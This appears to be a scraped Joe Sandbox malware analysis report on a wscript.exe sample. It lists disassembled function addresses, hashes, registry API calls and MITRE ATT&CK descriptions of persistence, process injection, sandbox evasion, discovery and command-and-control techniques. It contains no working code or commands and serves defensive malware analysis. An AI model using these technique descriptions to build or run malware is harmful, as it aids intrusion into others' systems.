Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CurrentThread
String ID: WSHRemote.Execute
API String ID: 2882836952-1341764647
Opcode ID: 83ee86308eadcab543354765f51cf13d8b09bca077f562c864ea0789ab55eecf
Instruction ID: fb3b8dc5bed1c25abdda614634a6e8e5f24d946c2ada64e693495540a51a131b
Opcode Fuzzy Hash: 83ee86308eadcab543354765f51cf13d8b09bca077f562c864ea0789ab55eecf
Instruction Fuzzy Hash: 7A116721E08A4286EB16EF25DC51178A271AB15B74F844135CA1FCA3E4DF2CF89987A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9D30C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA14A0: RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1502

RegCloseKey.ADVAPI32 ref: 00007FF7C0B9D387

Strings

DisplayLogo, xrefs: 00007FF7C0B9D362
Timeout, xrefs: 00007FF7C0B9D34C

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseCreate
String ID: DisplayLogo$Timeout
API String ID: 2932200918-1251482861
Opcode ID: 49fe2ba6aa6f8ff55c7d354cebacde66ec740d3e4028e200a61d6407c0192856
Instruction ID: 2e2ac2cfda22698dc1f4c8d6febafbeb5bfca03d53a273b1cc1acba3a9eae5aa
Opcode Fuzzy Hash: 49fe2ba6aa6f8ff55c7d354cebacde66ec740d3e4028e200a61d6407c0192856
Instruction Fuzzy Hash: 4301C821B1C68241EB51EF16D840769A760EB847E1FC05031EA5FC7B95CF2CF494C750

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.
Tactics:	Command and Control
Data Sources:	Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report xPUqa4qbDL

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exe PID: 6336 Parent PID: 5724

General

Function 00007FF7C0BA0EC4, Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 286
librarystringCOMMON

Function 00007FF7C0B98348, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 176
COMMON

Function 00007FF7C0B95A34, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 244
registrylibraryloaderCOMMON

Function 00007FF7C0B96CEC, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 169
registryCOMMON

Function 00007FF7C0B9AC78, Relevance: 15.1, APIs: 10, Instructions: 107
timenativethreadCOMMON

Function 00007FF7C0BA21C4, Relevance: 13.6, APIs: 9, Instructions: 121
fileCOMMON

Function 00007FF7C0BA1A34, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 169
registryCOMMON

Function 00007FF7C0B9AE8C, Relevance: 12.1, APIs: 8, Instructions: 95
threadwindowCOMMON

Function 00007FF7C0BA14A0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94
registryCOMMON

Function 00007FF7C0B941A8, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 173
COMMON

Function 00007FF7C0B95BFC, Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 378
libraryloaderwindowCOMMON

Function 00007FF7C0B94428, Relevance: 16.7, APIs: 11, Instructions: 163
memoryCOMMON

Function 00007FF7C0B9AFF0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73
windowregistryCOMMON

Function 00007FF7C0B962B0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72
libraryloaderCOMMON

Function 00007FF7C0B970B0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 96
registryCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre